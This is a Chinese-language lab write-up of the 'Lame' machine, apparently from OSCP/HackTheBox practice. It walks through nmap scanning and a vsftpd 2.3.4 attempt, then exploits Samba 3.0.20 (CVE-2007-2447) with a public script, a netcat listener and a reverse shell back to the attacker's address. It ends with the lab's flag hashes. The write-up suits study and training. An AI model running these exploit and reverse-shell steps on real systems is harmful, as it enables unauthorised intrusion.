OSCP系列-lab-Lame
环境:
内网 : kali 10.10.16.3
内网: 靶机 10.10.10.3
1.信息收集阶段
第一步,扫下这个IP下的端口 挑自己喜欢的工具 在kali里面 我就用nmap了
nmap -n -v -sS -p- 10.10.10.3 --max-retries=0 -oN scan.txt -Pn
-sS 半连接SYN扫描
-p- 全端口
–max-retries=0 重传次数为0 好处是快很多坏处是容易漏
-n 不进行反向解析
-v 显示详细信息
-Pn 默认主机存活
接下来 针对扫描出来的端口再次进行扫描
nmap -n -v -sC -sV -p 21,22,139,445,3632 10.10.10.3 -oN lame.txt -Pn
-sC 调用默认插件
-sV 探测服务/版本信息
-p 指定扫描端口
-oN 指定保存文件
到这里 其实针对扫描出来的版本信息 就可以去找一下有没有相关的漏洞 msf也好
而且这里一眼就能看出来
小学英文水平也能看懂
ftp-anon: Anonymous FTP login allowed (FTP code 230)
anonymous 任何人 FTP login 登录 allowed 允许通过
也就是匿名用户登录,登陆上看看,啥也没有哇
2.漏洞试探
vsftpd 2.3.4 相关漏洞 -> 参考链接:
https://blog.csdn.net/weixin_52497013/article/details/121090861)
https://www.exploit-db.com/exploits/49757
因为实验环境 可以用msf
试试看能不能从这里进去 (实际上漏洞点不在这里,后续才发现的)
直接msf
搜索vsftp 2.3.4 就有现成的exp
然后直接set rhost run 然后试试命令
能看到他确实解析了我的命令 但是这个靶机的点不在这里 这样一个一个敲命令也太慢了
别的漏洞可以自己搜索下,这里不赘述
最终的点在Samba 这里 这个也是我一开始就注意到的 因为 很少见到有服务器用Samba
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Samba 3.0.20 一样的去搜索相关的漏洞
https://www.exploit-db.com/exploits/16320
msf
也有直接可用的exp
这个版本的 Samba 在进行身份认证之前 会对 username 做映射 会解析你的 username 也就是说如果username是个命令 就可以解析执行 漏洞编号 CVE 2007-2447
然后搜索这个漏洞相关的 payload
https://github.com/ozuma/CVE-2007-2447
git clone https://github.com/ozuma/CVE-2007-2447
然后开启端口监听
nc -nlvp 1458
执行脚本
pip3 install pysmb
python3 samba-exploit.py 10.10.10.3 445 10.10.16.3 1458
然后得到一个反弹shell
搞一个交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AQYJ6WZb-1681460248821)(C:\Users\cc\AppData\Roaming\Typora\typora-user-images\image-20230414155224158.png)]
得到第一个hash
36ff879308d19844ee780ac93c951bcd
第二个hash在home下的makis目录下
36ff879308d19844ee780ac93c951bcd
第二个hash在home下的makis目录下
80f6ba3bf3983f55eb21a3cfab7191a5